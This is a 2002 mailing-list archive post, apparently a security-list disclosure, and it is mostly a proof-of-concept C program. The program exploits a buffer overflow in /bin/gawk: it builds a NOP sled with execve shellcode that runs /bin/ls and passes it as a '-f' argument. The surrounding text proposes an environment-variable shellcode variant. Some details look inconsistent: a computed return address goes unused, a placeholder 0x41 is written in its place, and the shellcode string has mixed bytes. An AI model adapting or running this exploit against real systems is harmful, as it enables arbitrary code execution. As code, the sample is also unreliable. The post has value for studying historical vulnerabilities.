I do a little research, and found that only accept ascci chars as arg and if you try to put a shellcode in the arg nothing occurs. I think if we store the shellcode in an env variable and write the ret address pointing to env shellcode could work. I attach a prove I made. /* --------------------------------------------------------------------------- Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: March 15, 2002 E-mail: gmaggiotat_private --------------------------------------------------------------------------- */ #include <stdio.h> #define OFFSET 18215 #define NOP 0x90 #define RET_72 0xbfffc6f0 #define RET 0x41 int main(int argc, char *argv[]) { int i=0; char buf[OFFSET]; int c, ret; char shellcode1[] = "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69/bin/ls"; ret = RET_72 - OFFSET; for(i=0;i<=OFFSET-1 ;i++) buf[i]=NOP; *(int *) &buf[i] = RET; memcpy(buf+131,shellcode1,strlen(shellcode1)); buf[0]='-'; buf[1]='f'; buf[2]=' '; execl("/bin/gawk", "/bin/gawk", buf, NULL); //puts(buf); return 0; }
This archive was generated by hypermail 2b30 : Fri Mar 15 2002 - 11:25:13 PST